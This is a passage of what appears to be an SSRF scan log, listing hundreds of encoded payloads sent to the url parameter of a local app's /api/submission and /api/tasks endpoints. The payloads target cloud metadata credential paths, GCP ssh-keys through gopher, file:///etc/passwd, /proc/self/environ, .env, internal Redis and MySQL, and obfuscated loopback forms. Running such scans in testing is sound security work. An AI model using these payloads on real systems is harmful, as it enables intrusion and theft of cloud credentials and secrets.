`http://localhost:4200/api/submission?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/submission?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/submission?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/submission?url=loopback` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A22` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A80` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A443` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/submission?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/submission?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/submission?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/submission?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/submission?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/submission?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/submission?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/submission?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/submission?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/submission?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/submission?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/submission?url=127.1%3A80` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/submission?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/submission?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/submission?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/submission?url=2130706433%2F` +- Testing: `http://localhost:4200/api/submission?url=3232235521%2F` +- Testing: `http://localhost:4200/api/submission?url=3232235777%2F` +- Testing: `http://localhost:4200/api/submission?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/submission?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/submission?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/submission?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/submission?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/submission?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/submission?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/submission?url=0%2F` +- Testing: `http://localhost:4200/api/submission?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/submission?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/tasks +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tasks?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/tasks?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tasks?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/tasks?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/tasks?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/tasks?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/tasks?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/tasks?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tasks?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tasks?url=0` +- Testing: `http://localhost:4200/api/tasks?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tasks?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tasks?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tasks?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tasks?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tasks?url=2130706433` +- Testing: `http://localhost:4200/api/tasks?url=017700000001` +- Testing: `http://localhost:4200/api/tasks?url=0x7f000001` +- Testing: `http://localhost:4200/api/tasks?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tasks?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=` +- Testing: `http://localhost:4200/api/tasks?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tasks?url=` +- Testing: `http://localhost:4200/api/tasks?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/tasks?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/tasks?url=google.com.localhost` +- Testing: `http://localhost:4200/api/tasks?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tasks?url=` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tasks?url=localtest.me` +- Testing: `http://localhost:4200/api/tasks?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tasks?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/tasks?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/tasks?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tasks?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tasks?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tasks?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tasks?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tasks?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tasks?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/tasks?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/tasks?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tasks?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tasks?url=0%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.1` +- Testing: `http://localhost:4200/api/tasks?url=127.0.1` +- Testing: `http://localhost:4200/api/tasks?url=localtest.me` +- Testing: `http://localhost:4200/api/tasks?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tasks?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tasks?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/tasks?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tasks?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tasks?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tasks?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tasks?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tasks?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tasks?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tasks?url=0` +- Testing: `http://localhost:4200/api/tasks?url=127.1` +- Testing: `http://localhost:4200/api/tasks?url=127.0.1` +- Testing: `http://localhost:4200/api/tasks?url=localhost` +- Testing: `http://localhost:4200/api/tasks?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/tasks?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/tasks?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/tasks?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/tasks?url=7F000001` +- Testing: `http://localhost:4200/api/tasks?url=2130706433` +- Testing: `http://localhost:4200/api/tasks?url=6425673729` +- Testing: `http://localhost:4200/api/tasks?url=127001` +- Testing: `http://localhost:4200/api/tasks?url=127_0._0_1` +- Testing: `http://localhost:4200/api/tasks?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/tasks?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tasks?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tasks?url=localtest.me` +- Testing: `http://localhost:4200/api/tasks?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tasks?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tasks?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tasks?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=0x7f000001` +- Testing: `http://localhost:4200/api/tasks?url=017700000001` +- Testing: `http://localhost:4200/api/tasks?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/tasks?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/tasks?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tasks?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/tasks?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/tasks?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/tasks?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tasks?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tasks?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254` +- Testing: `http://localhost:4200/api/tasks?url=2852039166` +- Testing: `http://localhost:4200/api/tasks?url=7147006462` +- Testing: `http://localhost:4200/api/tasks?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/tasks?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/tasks?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/tasks?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/tasks?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tasks?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/tasks?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tasks?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tasks?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/tasks?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/tasks?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/tasks?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/tasks?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/tasks?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tasks?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/tasks?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/tasks?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/tasks?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/tasks?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/tasks?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/tasks?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/tasks?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/tasks?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/tasks?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/tasks?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tasks?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/tasks?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/tasks?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tasks?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tasks?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/tasks?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tasks?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/tasks?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/tasks?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tasks?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/tasks?url=3232235521` +- Testing: `http://localhost:4200/api/tasks?url=3232235777` +- Testing: `http://localhost:4200/api/tasks?url=425.510.425.510` +- Testing: `http://localhost:4200/api/tasks?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/tasks?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/tasks?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/tasks?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/tasks?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/tasks?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/tasks?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tasks?url=customer2-app-169-254-169-254.nip.io` +- Testing: 